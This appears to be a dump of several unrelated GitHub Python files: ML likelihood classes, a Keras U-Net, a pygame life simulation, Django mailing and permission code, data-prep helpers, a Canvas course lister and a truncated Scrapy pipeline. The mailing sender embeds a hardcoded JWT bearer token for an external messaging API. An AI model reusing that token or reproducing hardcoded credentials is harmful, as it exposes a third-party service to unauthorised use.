+{"seq_id":"11451978600","text":"\"\"\"Non-negative integrands -- synthetic or real ML likelihoods.\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport gpflow\nfrom gpflow import default_float\n\n\nclass GaussianMixtureSyntheticLikelihood():\n    \"\"\"Synthetic likelihood built using a GMM.\"\"\"\n\n    def __init__(self, dimension: int = 1, seed: int = None) -> None:\n        \"\"\"Initialise. 
self.integral_value assumes integration against\n uniform measure on unit hypercube.\n \"\"\"\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n num_components = np.random.randint(5, 14)\n means = np.random.rand(num_components, dimension).tolist()\n scales = (np.random.randint(\n 11, 19, size=(num_components, dimension)\n ) / 100).tolist()\n weights = np.random.dirichlet(np.ones(num_components)).tolist()\n self.weights = tf.constant(weights, dtype=default_float())\n self.means = tf.constant(means, dtype=default_float())\n self.scales = tf.constant(scales, dtype=default_float())\n # Weighted sum of the integrals for each Gaussian.\n dists = tfp.distributions.Normal(self.means, self.scales)\n cdf_diffs = dists.cdf(tf.ones_like(self.means)) - dists.cdf(tf.zeros_like(self.means))\n self.integral_value = tf.math.reduce_sum(self.weights * tf.math.reduce_prod(cdf_diffs, -1))\n \n def posterior_samples(self, num_samples: int, sample_factor: int = 16) -> tf.Tensor:\n indices = tfp.distributions.Categorical(probs=self.weights).sample(num_samples)\n indices = tf.sort(indices) # So count order is correct\n _, _, counts = tf.unique_with_counts(indices)\n samples = []\n for i, (m, s) in enumerate(zip(self.means, self.scales)):\n samples.append(tfp.distributions.TruncatedNormal(\n m, s, tf.zeros_like(m), tf.ones_like(m)\n ).sample(counts[i]))\n return tf.concat(samples, 0)\n\n def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n \"\"\"Likelihood value at x.\n \n :param x: Query locations, shape [N, D].\n :return: The likelihood values at x, shape [N, 1].\n \"\"\"\n if len(x.shape) < 2:\n x = tf.reshape(x, (1, -1))\n dists = tfp.distributions.Normal(self.means, self.scales)\n weighted_log_probs = (\n tf.reduce_sum(dists.log_prob(tf.expand_dims(x, 1)), -1) + tf.math.log(self.weights)\n )\n log_lik = tf.math.reduce_logsumexp(weighted_log_probs, axis=-1, keepdims=True)\n if return_log:\n return log_lik\n else:\n return tf.exp(log_lik)\n\n\nclass BayesianLogisticRegressionLikelihood():\n \"\"\"Likelihood for a Bayesian Logistic Regression model.\"\"\"\n\n def __init__(\n self,\n prior: tfp.distributions.Distribution,\n train_inputs: tf.Tensor = None,\n train_targets: tf.Tensor = None,\n dimension: int = None,\n num_data: int = 1000,\n seed: int = None,\n num_mc_samples: int = 10000,\n integral_value: float = None,\n log_shift: float = 0.0\n ) -> None:\n \"\"\"Initialise. 
self.integral_value assumes integration against\n        a uniform measure on the unit hypercube (shifted to be centred on the\n        origin).\n        \"\"\"\n        if seed is not None:\n            np.random.seed(seed)\n            tf.random.set_seed(seed)\n        # prior = tfp.distributions.Uniform(\n        #     low=tf.cast([-0.5] * dimension, tf.float64),\n        #     high=tf.cast([0.5] * dimension, tf.float64)\n        # )\n        if train_inputs is None:\n            if dimension is None:\n                raise TypeError('One of train_inputs or dimension must be specified.')\n            self.weights = tf.expand_dims(prior.sample(), -1)  # [D, 1]\n            self.train_inputs = tf.random.normal((num_data, dimension), dtype=default_float())  # [N, D]\n            bernoulli_logits = self.train_inputs @ self.weights  # [N, 1]\n            # [N, 1]\n            self.train_targets = tfp.distributions.Bernoulli(logits=bernoulli_logits).sample() \n        else:\n            self.train_inputs = train_inputs\n            self.train_targets = train_targets\n        if integral_value is None:\n            # Monte Carlo estimate of the integral under the prior.\n            mc_samples = prior.sample(num_mc_samples)\n            integral_value = float(tf.reduce_mean(self(mc_samples)))\n        self.integral_value = integral_value\n        self.log_shift = log_shift\n    \n    def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n        \"\"\"Likelihood value at x.\n        \n        :param x: Query locations, shape [M, D].\n        :return: The likelihood values at x, shape [M, 1].\n        \"\"\"\n        if len(x.shape) < 2:\n            x = tf.reshape(x, (1, -1))\n        logits = tf.squeeze(tf.linalg.matmul(\n            tf.expand_dims(self.train_inputs, 0),  # [1, N, D]\n            tf.expand_dims(x, -1)  # [M, D, 1]\n        ), -1)  # [M, N]\n        dist = tfp.distributions.Bernoulli(logits=logits)\n        # [M]\n        log_lik = tf.reduce_sum(dist.log_prob(self.train_targets[:, 0]), axis=-1, keepdims=True) - self.log_shift\n        if return_log:\n            return log_lik\n        else:\n            return tf.exp(log_lik)\n\n\nclass GaussianProcessRegressionLikelihood():\n    \"\"\"Likelihood for a Gaussian Process Regression model.\"\"\"\n\n    def __init__(\n        self,\n        prior: tfp.distributions.Distribution,\n        train_inputs: tf.Tensor = None,\n        train_targets: tf.Tensor = None,\n        dimension: int = None,\n        num_data: int = 100,\n        seed: int = None,\n        num_mc_samples: int = 10000,\n        integral_value: float = None,\n        log_shift: float = 0.0\n    ) -> None:\n        \"\"\"Initialise. 
self.integral_value assumes integration against\n        a uniform measure on the unit hypercube.\n        \"\"\"\n        if seed is not None:\n            np.random.seed(seed)\n            tf.random.set_seed(seed)\n        # prior = tfp.distributions.Uniform(\n        #     low=tf.cast([1.0, 0.01] + [1e-6] * dimension, tf.float64),\n        #     high=tf.cast([10.0, 0.1] + [1.0] * dimension, tf.float64)\n        # )\n        kernel = gpflow.kernels.Matern12(lengthscales=tf.ones(dimension, dtype=default_float()))\n        if train_inputs is None:\n            if dimension is None:\n                raise TypeError('One of train_inputs or dimension must be specified.')\n            # [signal_variance, noise_variance, lengthscales]\n            self.hyperparameters = prior.sample()\n            # [N, D]\n            self.train_inputs = tf.random.normal((num_data, dimension), dtype=default_float())\n            kernel.variance.assign(self.hyperparameters[0])\n            kernel.lengthscales.assign(self.hyperparameters[2:])\n            covar = kernel(self.train_inputs) + self.hyperparameters[1] * tf.eye(\n                num_data, dtype=default_float()\n            )\n            self.train_targets = tf.expand_dims(tfp.distributions.MultivariateNormalFullCovariance(\n                loc=tf.zeros(num_data, dtype=default_float()), covariance_matrix=covar\n            ).sample(), -1)\n        else:\n            self.hyperparameters = None\n            self.train_inputs = train_inputs\n            self.train_targets = train_targets\n        self.model = gpflow.models.GPR((self.train_inputs, self.train_targets), kernel=kernel)\n        if self.hyperparameters is not None:\n            self.model.likelihood.variance.assign(self.hyperparameters[1])\n        if integral_value is None:\n            # Monte Carlo estimate of the integral under the prior.\n            mc_samples = prior.sample(num_mc_samples)\n            integral_value = float(tf.reduce_mean(self(mc_samples)))\n        self.integral_value = integral_value\n        self.log_shift = log_shift\n    \n    def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n        \"\"\"Likelihood value at x.\n        \n        :param x: Query locations, shape [N, D].\n        :return: The likelihood values at x, shape [N, 1].\n        \"\"\"\n        if len(x.shape) < 2:\n            x = tf.reshape(x, (1, -1))\n        lmls = []\n        for xi in x:\n            self.model.kernel.variance.assign(xi[0])\n            self.model.kernel.lengthscales.assign(xi[2:])\n            self.model.likelihood.variance.assign(xi[1])\n            lmls.append(self.model.log_marginal_likelihood())\n        log_lik = tf.reshape(lmls, (-1, 1)) - self.log_shift\n        if return_log:\n            return log_lik\n        else:\n            return tf.exp(log_lik)\n","repo_name":"saadhamidml/piflow","sub_path":"piflow/objectives/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34409659863","text":"from django.core.management import BaseCommand\nfrom django.contrib.auth.models import Group, Permission\nfrom django.contrib.contenttypes.models import ContentType\nfrom users.models import User\nfrom mail.models import Mailing, SettingMail, Client\n\n\nclass Command(BaseCommand):\n\n    def handle(self, *args, **kwargs):\n        new_group, created = Group.objects.get_or_create(name='manager')\n        ct_user = ContentType.objects.get_for_model(User)\n        ct_mail = ContentType.objects.get_for_model(Mailing)\n        ct_setting = ContentType.objects.get_for_model(SettingMail)\n        ct_client = ContentType.objects.get_for_model(Client)\n\n        view_user = Permission.objects.get(codename='view_user', name='Can view user', content_type=ct_user)\n        change_user = Permission.objects.get(codename='change_user', name='Can change user', content_type=ct_user)\n        view_mail = Permission.objects.get(codename='view_mailing', name='Can view сообщение', content_type=ct_mail)\n        view_setting = 
Permission.objects.get(codename='view_settingmail', name='Can view настройка',\n content_type=ct_setting)\n view_client = Permission.objects.get(codename='view_client', name='Can view клиент', content_type=ct_client)\n change_setting = Permission.objects.get(codename='change_settingmail', name='Can change настройка',\n content_type=ct_setting)\n\n new_group.permissions.add(view_user, change_user, view_client, view_mail, view_setting, change_setting)\n","repo_name":"Renntor/Mailing","sub_path":"users/management/commands/create_group.py","file_name":"create_group.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36439773268","text":"import pygame\nimport params\nimport argparse\nimport time\nfrom world import World\n\n# Colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nOUTLINE = (191, 5, 191)\nWATER = (25, 182, 193)\n\n# Map size\nGRID_SIZE = (50, 20)\nBLOCK_SIZE = 30\nLAKE_SIZE = 5\nFOREST_WIDTH = 5\n\n\nclass BoardRenderer:\n \"\"\"\n Handles the drawing & rendering of the game window.\n Displays the main grid of the game.\n \"\"\"\n\n def __init__(self, name, grid_size, block_size):\n self.block_size = block_size\n self.grid_size = grid_size\n self.width, self.height = grid_size\n\n # Init pygame window\n pygame.init()\n pygame.display.set_caption(name)\n self.window = pygame.display.set_mode((self.width * block_size, self.height * block_size))\n\n # Init game fonts\n self.font = pygame.font.SysFont('comicsansms', 18)\n self.counter_font = pygame.font.SysFont('comicsansms', 36)\n\n # Create game board\n self.board = []\n for y in range(0, self.height):\n self.board.append([])\n for x in range(0, self.width):\n self.board[y].append(pygame.Rect(x * block_size, y * block_size, block_size, block_size))\n\n # Other params\n self.background_color = BLACK\n\n def draw_world(self, world):\n \"\"\"\n Renders the game world as a grid of rectangles.\n Yellow rectangles -> blips\n Blue rectangle -> water\n Green rectangles -> forest\n\n :param world: The world simulation\n \"\"\"\n\n # Clear screen\n self.window.fill(self.background_color)\n\n # Draw board\n for y in range(0, self.height):\n for x in range(0, self.width):\n c = BLACK\n\n blip_count = 0\n if world.map[y][x].blips:\n blip_count = len(world.map[y][x].blips)\n\n # Color code the blip's health %\n total_status = (0, 0, 0)\n\n for b in world.map[y][x].blips:\n status = b.get_status()\n total_status = tuple(map(sum, zip(total_status, status)))\n\n # Get average health in case of multiple blips\n hp = min(total_status)\n c = (255, 255 * hp / blip_count, 0)\n\n elif world.map[y][x].type == \"water\":\n c = WATER\n elif world.map[y][x].type == \"forest\":\n # Make sure the tile doesn't disappear completely\n fill_percent = max(world.map[y][x].value / params.FOOD_SIZE, 0.2)\n c = (0, 255 * fill_percent, 0)\n\n pygame.draw.rect(self.window, c, self.board[y][x], 0)\n\n # Add count for multiple blips in a tile\n if blip_count > 1:\n self.add_text(str(blip_count), BLACK, self.board[y][x].center, self.font)\n\n # Draw grid lines\n for i in range(0, self.height):\n screen_y = i * self.block_size\n pygame.draw.line(self.window, OUTLINE, (0, screen_y), (self.width * self.block_size, screen_y), 2)\n for i in range(0, self.width):\n screen_x = i * self.block_size\n pygame.draw.line(self.window, OUTLINE, (screen_x, 0), (screen_x, self.height * self.block_size), 2)\n\n # Write population count\n pos = (self.width * self.block_size / 2, 20)\n 
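 # (Note: add_text centres the rendered string on the given position via\n # get_rect(center=...), so the call below draws the live blip count at the\n # top-middle of the window just before the display flip.)\n 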
self.add_text(str(len(world.blips.keys())), WHITE, pos, self.counter_font)\n\n # Render to screen\n pygame.display.flip()\n\n def add_text(self, text, color, pos, font):\n \"\"\"\n Add text on the screen centered on the given position.\n Does not update the display!\n\n :param text: Text to write on screen\n :param color: Text color to render\n :param pos: Text position on screen\n :param font: The font used to write the text\n \"\"\"\n text = font.render(text, True, color)\n text_rec = text.get_rect(center=pos)\n self.window.blit(text, text_rec)\n\n\ndef init_game():\n \"\"\"\n Creates a new BoardRenderer to display the game and\n a new World to simulate the game.\n\n :return: A tuple (BoardRenderer, Word)\n \"\"\"\n return BoardRenderer('LifeSim', GRID_SIZE, BLOCK_SIZE), World(GRID_SIZE, LAKE_SIZE, FOREST_WIDTH)\n\n\ndef main():\n # Add arg types\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--simple\", help=\"Don't display graphics\", action=\"store_true\")\n parser.add_argument(\"-d\", \"--delay\", help=\"Delay between turns\", type=float)\n parser.add_argument(\"-p\", \"--parameters_file\", help=\"Load parameters from the given file\")\n\n # Parse args\n args = parser.parse_args()\n\n delay = 0\n if args.delay:\n delay = args.delay\n\n if args.parameters_file:\n params.read_params(args.parameters_file)\n\n # Start the game\n renderer, world = init_game()\n\n turn = 0\n population = [0 for _ in range(params.MAX_LIFE)]\n done = False\n while not done:\n # Get input\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n done = True\n\n # Prepare the next turn\n world.turn_start()\n\n # Update the world\n world.update()\n\n # Complete the current turn\n world.turn_end()\n\n # Draw world\n if not args.simple:\n renderer.draw_world(world)\n\n # Update population buffer\n current = len(world.blips.keys())\n population[turn % params.MAX_LIFE] = current\n if turn >= params.MAX_LIFE - 1:\n # Compute statistic for the period\n avg = sum(population) / len(population)\n best = max(population)\n worst = min(population)\n\n # Check if population has stabilized\n eps = 0.1 * avg\n if abs(best - avg) < eps and abs(worst - avg) < eps:\n done = True\n\n # Print some results in the terminal\n print(\"Best: {0}; Worst: {1}, Avg: {2}, Current {3}\".format(best, worst, avg, current))\n\n turn += 1\n if current == 0:\n done = True\n\n # Time between rounds\n time.sleep(delay)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andreyciupitu/life-simulation","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17484430030","text":"import time\nimport serial\n\nser_arduino = serial.Serial(\n port='/dev/ttyUSB0', #Replace ttyS0 with ttyAM0 for Pi1,Pi2,Pi0\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\n\ntime.sleep(8)\nser_arduino.write(b\",off,23,23,\")\n\n\n","repo_name":"pasbatron/Project-Barcode-Scaner-Kanban","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3763307617","text":"import numpy as np\nimport keras\nfrom keras.layers import Conv3D, Add, SpatialDropout3D, AveragePooling3D, UpSampling3D, Input, MaxPooling3D, Concatenate, Activation, Multiply, Lambda\nfrom 
keras.layers import Conv2D, SpatialDropout2D, AveragePooling2D, UpSampling2D, MaxPooling2D, DepthwiseConv2D, Conv2DTranspose, LocallyConnected2D\nfrom DepthwiseConv3D import DepthwiseConv3D\nfrom keras.models import Model, Sequential\nfrom keras.models import model_from_json, load_model\nfrom keras.utils import multi_gpu_model\nfrom keras.utils.np_utils import to_categorical\nfrom keras.regularizers import l1, l2\nimport keras.backend as K\nfrom keras.initializers import Constant\nimport tensorflow as tf\n\nimport settings\nfrom ista import ISTA\n\n\ndef ConvBlock(model_in, filters=settings.options.filters, add=True, drop=True, use_depthwise=settings.options.depthwise):\n kreg = None\n wreg = None\n if settings.options.l1reg:\n kreg=l1(settings.options.l1reg)\n\n if use_depthwise:\n model = DepthwiseConv2D( \\\n kernel_size=(5,5),\n padding='same',\n depth_multiplier=4,\n activation='linear',\n use_bias=False,\n kernel_regularizer=kreg )(model_in)\n model = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=settings.options.activation,\n kernel_regularizer=wreg,\n use_bias=True)(model)\n else:\n model = Conv2D( \\\n filters=filters,\n kernel_size=(3,3),\n padding='same',\n activation=settings.options.activation,\n kernel_regularizer=kreg,\n use_bias=True)(model_in)\n if drop:\n model = SpatialDropout2D(settings.options.dropout)(model)\n if add:\n model = Add()([model_in, model])\n return model\n\n\ndef Block(model, filters):\n if settings.options.densenet:\n model1 = ConvBlock(model, add=False, drop=False, filters=filters)\n model2 = ConvBlock(model1, add=False, drop=False, filters=filters)\n model = Concatenate()([model, model1, model2])\n model = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=settings.options.activation)(model)\n elif settings.options.unet:\n model = ConvBlock(model, add=False, drop=False, filters=filters)\n model = ConvBlock(model, add=False, drop=False, filters=filters)\n elif settings.options.resnet:\n model = ConvBlock(model, add=True, drop=False, filters=filters)\n model = ConvBlock(model, add=True, drop=False, filters=filters)\n return model\n\n\ndef module_mid(model, depth, filters=settings.options.filters):\n if depth==0:\n return Block(model, filters)\n\n else:\n\n m_down = Block(model, filters=filters)\n \n if not settings.options.pocket:\n filters*=2\n m_down = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=None)(m_down)\n m_mid = MaxPooling2D()(m_down)\n \n m_mid = module_mid(m_mid, depth=depth-1, filters=filters)\n \n if not settings.options.pocket:\n filters = int(filters/2)\n\n if settings.options.conv2Dtranspose:\n m_up = Conv2DTranspose( \\\n filters=filters,\n kernel_size=(2,2),\n padding='same',\n activation=None,\n strides=(2,2) )(m_mid)\n else:\n m_up = UpSampling2D()(m_mid)\n if settings.options.pocket:\n m_up = Add()([m_up, m_down])\n else:\n m_up = Concatenate()([m_up, m_down])\n m_up = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=None)(m_up)\n\n m_up = Block(m_up, filters=filters)\n return m_up\n\n\ndef unet(layer_in, depth=settings.options.depth):\n return module_mid(layer_in, depth=depth)\n\ndef CapLayer(layer_in, act_f=None, classes=1):\n layer = SpatialDropout2D(settings.options.dropout)(layer_in)\n layer = Conv2D(\\\n filters=classes,\n kernel_size=(1,1),\n padding='same',\n activation=act_f,\n use_bias=True)(layer)\n return layer\n\n\ndef get_unet_liver():\n _filters = settings.options.filters\n indim = 
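 # (Aside: a minimal standalone sketch of the recursive encoder/decoder\n # pattern that module_mid implements above -- plain tf.keras stands in for\n # the settings-driven code here, and the depth, filter counts and input\n # size are invented for illustration:\n #\n # import tensorflow as tf\n # from tensorflow.keras import layers\n #\n # def mid(x, depth, filters=16):\n # if depth == 0:\n # return layers.Conv2D(filters, 3, padding='same', activation='relu')(x)\n # down = layers.Conv2D(filters, 3, padding='same', activation='relu')(x)\n # inner = mid(layers.MaxPooling2D()(down), depth - 1, filters * 2)\n # up = layers.UpSampling2D()(inner)\n # up = layers.Conv2D(filters, 1, padding='same')(up) # match channels\n # return layers.Concatenate()([up, down]) # skip connection\n #\n # inp = tf.keras.Input(shape=(64, 64, 1))\n # model = tf.keras.Model(inp, mid(inp, depth=2))\n #\n # Each level halves the spatial resolution, recurses, then upsamples and\n # merges the skip path, mirroring the MaxPooling2D / UpSampling2D /\n # Concatenate trio above.)\n 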
(settings._ny, settings._nx)\n img_in = Input(shape=(*indim, 1))\n\n _features = Conv2D(\\\n filters=_filters,\n kernel_size=(7,7),\n padding='same',\n activation=settings.options.activation)(img_in)\n _unet = unet(_features)\n _unet = Add()([_features, _unet])\n _out = CapLayer(_unet, classes=1, act_f='sigmoid')\n _model = Model(inputs=img_in, outputs=_out)\n _model.summary()\n if settings.options.gpu > 1:\n return multi_gpu_model(_model, gpus=settings.options.gpu)\n return _model\n\ndef get_unet_tumor(liver_model):\n _filters = settings.options.filters\n indim = (settings._ny, settings._nx)\n\n all_in = Input(shape=(*indim, 2))\n\n img = Lambda( lambda x: x[...,0,np.newaxis] )(all_in)\n label = Lambda( lambda x: x[...,1,np.newaxis])(all_in)\n mask = Multiply()([img, label])\n all_in3 = Concatenate()([img, label, mask])\n\n tumor_features = Conv2D(\\\n filters=_filters,\n kernel_size=(7,7),\n padding='same',\n activation=settings.options.activation)(all_in3)\n tumor_unet = unet(tumor_features)\n tumor_out = Add()([tumor_features, tumor_unet])\n tumor_out = CapLayer(tumor_out, classes=1, act_f='sigmoid')\n tumor_model = Model(inputs=all_in, outputs=tumor_out)\n tumor_model.summary()\n# print('\\t preloading weights from liver model...')\n# for i, lyr in enumerate(liver_model.layers):\n# if lyr.name == 'conv2d_1':\n# print(lyr)\n# else:\n# tumor_model.layers[i-4].set_weights(lyr.get_weights())\n\n if settings.options.gpu > 1:\n return multi_gpu_model(tumor_model, gpus=settings.options.gpu)\n return tumor_model\n \ndef get_unet_ensemble(liver_model, tumor_model, tune_liver=False, tune_tumor=True):\n _filters = settings.options.filters\n indim = (settings._ny, settings._nx)\n\n img_in = Input(shape=(*indim, 1))\n\n liver_model.trainable=tune_liver\n liver_seg = liver_model(img_in)\n\n tumor_model.trainable=tune_tumor\n tumor_ins = Concatenate()([img_in, liver_seg])\n tumor_seg = tumor_model(tumor_ins)\n\n two_segs = Concatenate()([liver_seg, tumor_seg])\n model = Model(inputs=img_in, outputs=two_segs)\n if settings.options.gpu > 1:\n model = multi_gpu_model(model, gpus=settings.options.gpu)\n\n return model\n\n","repo_name":"jonasactor/smallnet","sub_path":"tumorhcc-ensemble/buildmodel.py","file_name":"buildmodel.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1234691658","text":"from django.db.models import Sum, Q\nimport requests\nfrom datetime import datetime\nimport pytz\nfrom mailing__mailing.models import Mailing\nfrom mailing__client.models import Client\nfrom mailing__message.models import Message\nfrom mailing__message.views import MessageApiView\n\n\ndef send_mailing(mailing_id):\n mailing_instance = Mailing.objects.filter(id=mailing_id).first()\n if not mailing_instance or mailing_instance.id is None:\n return \"ERROR. 
Object with mailing id does not exist."\n properties_filter = mailing_instance.properties_filter\n if isinstance(properties_filter, list):\n operator_code_filter = []\n tag_filter = []\n for p_filter in properties_filter:\n if \"operator_code\" in p_filter and isinstance(p_filter['operator_code'], str):\n operator_code_filter.append(p_filter['operator_code'])\n if \"tag\" in p_filter and isinstance(p_filter['tag'], str):\n tag_filter.append(p_filter['tag'])\n if len(operator_code_filter) > 0 or len(tag_filter) > 0:\n found_clients = Client.objects.filter(Q(mobile_operator_code__in=operator_code_filter) | Q(tags__name__in=tag_filter)).distinct()\n for client in found_clients:\n try:\n new_msg = Message(sending_status=0, mailing=mailing_instance, client=client)\n new_msg.save()\n send_to_external_api(new_msg.id)\n except Exception as e:\n print(e)\n return \"OK. Created messages for {} clients.\".format(found_clients.count())\n # Only report an error when the filter matched nothing; previously the\n # error string was returned even after messages had been sent.\n return \"ERROR. No clients found by mailing's filter.\"\n\n\ndef send_to_external_api(message_id):\n message_instance = Message.objects.filter(id=message_id).first()\n if not message_instance or message_instance.id is None:\n return \"ERROR. Object with message id does not exist.\"\n access_token = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDIwMzE2MTcsImlzcyI6ImZhYnJpcXVlIiwibmFtZSI6Im5pYXlzaGluIn0.vvsO4pdWYCXAfeiGAgaytNJCgEDXzai4phHaIBdyhXE\"\n end_date = message_instance.mailing.end_date\n current_date_utc = datetime.now(pytz.utc)\n if current_date_utc >= end_date:\n try:\n message_instance.sending_status = -1\n message_instance.save()\n except:\n pass\n return \"\"\n response = requests.post(f'https://probe.fbrq.cloud/v1/send/{message_instance.id}', \n headers={'Authorization': f'Bearer {access_token}'},\n json={\n \"id\": message_instance.id, \n \"phone\": message_instance.client.phone_as_int(), \n \"text\": message_instance.mailing.msg_text\n }\n )\n if response.status_code == 200 and response.json()['code'] == 0:\n try:\n message_instance.sending_status = 1\n message_instance.save()\n except:\n pass\n else:\n MessageApiView.retry_sending(message_instance)\n\n","repo_name":"NickG0od/mailing_project_test_task","sub_path":"mailing/mailing__mailing/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"13772211376","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.impute import SimpleImputer\n\ndef prep_iris(iris):\n iris = iris.drop(columns=['species_id', 'measurement_id'])\n iris = iris.rename(columns={'species_name':'species'})\n iris_dummy = pd.get_dummies(iris.species, drop_first=True)\n iris = pd.concat([iris, iris_dummy], axis=1)\n return iris\n\ndef prep_titanic(titanic):\n titanic = titanic.set_index('passenger_id').drop(columns=['class', 'embark_town', 'age', 'deck'])\n titanic_dummy = pd.get_dummies(titanic[['sex', 'embarked']], drop_first=[True,True])\n titanic = pd.concat([titanic, titanic_dummy], axis=1)\n return titanic\n\ndef prep_telco(telco):\n telco = telco.set_index('customer_id').drop(columns=['payment_type_id', 'internet_service_type_id', 'contract_type_id', 'paperless_billing'])\n telco = telco.replace(['Yes', 'No'], [1,0])\n telco_dummies = pd.get_dummies(telco[['gender','multiple_lines', 'online_security', 'online_backup', 'device_protection', 'tech_support', 'streaming_tv', 'streaming_movies', 'contract_type', 'internet_service_type', 'payment_type']], drop_first=True)\n telco = pd.concat([telco, telco_dummies], axis=1)\n 
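# total_charges is read in as strings and can contain blanks; the next\n # line maps those blanks to 0 before casting the column to float.\n 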
telco.total_charges = telco.total_charges.replace(' ', 0).astype(float)\n return telco\n\ndef split_data(df, target):\n '''\n take in a DataFrame and return train, validate, and test DataFrames; stratify on survived.\n return train, validate, test DataFrames.\n '''\n train_validate, test = train_test_split(df, test_size=.2, random_state=123, stratify=df[target])\n train, validate = train_test_split(train_validate, \n test_size=.25, \n random_state=123, \n stratify=train_validate[target])\n return train, validate, test","repo_name":"wilson-velasco/classification-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7994613062","text":"from canvasapi import Canvas\nimport os\nimport sys\nfrom pathlib import Path\nimport csv\n\napi_key = os.environ.get(\"CANVAS_API_KEY\", None)\n\nif api_key is None:\n homedir = os.environ[\"HOME\"]\n # print(\"Home directory is {:s}.\".format(homedir))\n secretsfile = Path(f\"{homedir}/.secrets/canvas-api-key\")\n # print(f\"secretsfile is {secretsfile}.\")\n if os.path.exists(secretsfile) and os.access(secretsfile, os.R_OK):\n with open(secretsfile, \"r\") as f:\n api_key = f.read()\n print(f\"Retrieved CANVAS_API_KEY from {secretsfile}.\")\n\nif api_key is None:\n print(\"This script requires a Canvas API key to be provided\")\n print(\"in the environment variable CANVAS_API_KEY.\")\n print(\"A fallback search in the file {} failed.\".format(secretsfile))\n print(\"That variable remains unset, so execution cannot continue.\")\n sys.exit(1)\n\napi_url = \"https://canvas.ubc.ca\"\ncanvas = Canvas(api_url, api_key)\nme = canvas.get_current_user()\nmy_courses = me.get_courses()\ndel canvas\n\nprint(f\"\\nThe given key identifies {me.name}, \", end=\"\")\nprint(f\"user number {me.id}.\\n\")\n\nprint(f\"User {me.id} has TeacherEnrollment role in the following courses [CSV]:\\n\")\nprint(80 * \"=\")\n\n# Canvas returns many course objects, some with unexpected characteristics.\n# Ignore those in what follows. 
Build a dict of apparently-relevant ones.\n\ncnum2title = {} # Prefix 'c' indicates 'course number to [course] title'\nfor c in my_courses:\n if hasattr(c, \"course_code\") and hasattr(c, \"enrollments\"):\n for d in c.enrollments:\n # Each d is a dict of roles, etc.\n # If one shows me in the Teacher role, print it and\n # ignore the rest.\n if d[\"user_id\"] == me.id and d[\"role\"] == \"TeacherEnrollment\":\n cnum2title[int(c.id)] = c.name\n\nstdout_ = sys.stdout\ncsvwriter = csv.writer(stdout_, quoting=csv.QUOTE_NONNUMERIC)\ncsvwriter.writerow([\"Canvas ID\", \"Course Name\"])\nfor cnum, ctitle in sorted(cnum2title.items(), key=lambda kv: kv[1]):\n csvwriter.writerow([cnum, ctitle])\n\nsys.exit(0)\n","repo_name":"plomgrading/plom","sub_path":"contrib/canvas-show-courses.py","file_name":"canvas-show-courses.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"13883706324","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom __future__ import print_function, unicode_literals\nfrom wcwidth import wcswidth as ww\nimport sys\nsys.path.append('C:\\\\Users\\\\GerrardLiu\\\\PycharmProjects\\\\Fund\\\\tutorial\\\\tutorial')\nfrom colorama import init\ninit()\nfrom colorama import Fore, Back, Style\nfrom tutorial.items import FundItem, BlockItem, Block1Item, IndexItem\n\n\ndef rpad(s, n, c=' '):\n return s + (n-ww(s)) * c # 对齐\n\n\ninit(autoreset=True)\ninit(wrap=True)\n\n\nclass TutorialPipeline(object):\n def process_item(self, item, spider):\n if isinstance(item, FundItem):\n # profit = 0\n # cur_money = 0\n temp = dict(item)\n # f = open(\"cgf.csv\", 'r')\n # lines = f.readlines()\n # for line in lines:\n # code, money = line.split(\",\")\n # if code == item['code']:\n # cur_money = money\n # f.close()\n temp_list = [temp['name'], temp['percent'], temp['price']]\n if temp_list[1][0] == '-':\n # profit = float(temp_list[1]) * 0.01 * cur_money\n # print(profit)\n temp_list[1] = (Fore.GREEN + temp_list[1] + \"%\" + Style.RESET_ALL)\n else:\n temp_list[1] = (Fore.RED + \"+\" + temp_list[1] + \"%\" + Style.RESET_ALL)\n out = \"{} {} {}\".format(rpad(temp_list[0], 30), rpad(temp_list[1], 